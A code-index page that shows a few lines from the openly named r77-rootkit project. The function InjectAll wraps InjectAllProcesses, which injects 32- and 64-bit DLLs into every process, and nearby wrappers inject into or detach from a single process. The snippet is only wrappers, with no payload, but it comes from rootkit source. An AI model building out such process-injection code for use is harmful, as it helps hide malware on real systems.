MCPcopy Create free account
hub / github.com/bytecode77/r77-rootkit / InjectAll

Function InjectAll

Helper/Helper.c:105–108  ·  view source on GitHub ↗

Source from the content-addressed store, hash-verified

103 return InjectDll(processId, dll, dllSize);
104}
105BOOL InjectAll(LPBYTE dll32, DWORD dll32Size, LPBYTE dll64, DWORD dll64Size)
106{
107 return InjectAllProcesses(dll32, dll32Size, dll64, dll64Size);
108}
109BOOL Detach(DWORD processId)
110{
111 return DetachInjectedProcessById(processId);

Callers

nothing calls this directly

Calls 1

InjectAllProcessesFunction · 0.85

Tested by

no test coverage detected